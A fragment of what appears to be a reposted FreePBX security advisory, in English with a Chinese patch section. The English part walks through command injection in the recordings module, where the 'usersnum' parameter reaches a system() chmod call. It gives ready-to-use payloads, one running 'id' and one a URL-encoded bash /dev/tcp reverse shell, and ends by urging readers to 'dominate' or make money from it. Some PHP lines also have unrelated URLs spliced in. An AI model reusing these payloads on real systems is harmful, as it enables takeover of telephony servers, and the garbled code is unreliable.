<h6><?php
echo _("Click \"SAVE\" when you are satisfied with your recording");
echo "<input type=https://www.linuxidc.com/Linux/2014-02/\"hidden\" name=https://www.linuxidc.com/Linux/2014-02/\"suffix\" value=https://www.linuxidc.com/Linux/2014-02/\"$suffix\">\n"; ?>
<input type="submit" value="<?php echo _("Save")?>"
tabindex="<?php echo ++$tabindex;?>"></h6>
<?php recordings_form_jscript(); ?>
</form>
</div>
<?php
}
Actually as you can see there are many exploitable lines there , but here
am interested about this line
system("chmod g+rw ".$destfilename);
if you traced the function flow you will notice that 'destfilename' get
part of his value from the parameter $_REQUEST['usersnum']
the function is called via
Target/admin/config.php?type=setup&display=recordings
before uploading open firebug
search for usersnum
edit value to
fa;id>faris;fax
or , for backconnetion use
fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.56.1%2f1337%200%3E%261;faris
and you are ready to dominate , or even make some $$ if you r interested ;)
建议:
--------------------------------------------------------------------------------
厂商补丁:
FreePBX
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: